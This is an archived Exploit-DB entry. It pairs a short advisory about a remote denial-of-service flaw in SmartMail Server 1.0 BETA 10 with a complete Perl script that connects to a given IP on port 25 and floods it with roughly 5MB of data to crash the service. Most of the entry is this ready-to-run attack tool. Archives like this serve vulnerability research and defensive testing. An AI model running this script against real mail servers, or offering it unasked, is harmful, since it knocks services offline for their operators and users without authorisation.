exploit-db-mirror/exploits/windows/dos/21973.pl
Offensive Security b4c96a5864 DB: 2021-09-03
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

27 lines
No EOL
863 B
Perl
Executable file

source: https://www.securityfocus.com/bid/6075/info
SmartMail Server is reported to be prone to a remote denial of service
condition. It is possible to trigger this condition by sending large amounts (5MB+) of data to the server via TCP port 25 or 110.
SmartMail Server will need to be restarted to regain normal functionality.
This issue was reported in SmartMail Server 1.0 BETA 10. It is not known if other versions are affected.
#!/usr/bin/perl -w
# tool smartdos.pl
# securma@caramail.com
# Greetz: marocit and #crack.fr (specialement christal.)
#
use IO::Socket;
if ($#ARGV<0)
{
print "\n write the target IP!\n\n";
exit;
}
$buffer = "A"x 5099999 ;
$connect = IO::Socket::INET ->new (Proto=>"tcp",
PeerAddr=> "$ARGV[0]",
PeerPort=>"25"); unless ($connect) { die "cant connect $ARGV
[0]" }
print $connect "$buffer";
print "\nsending exploit......\n\n";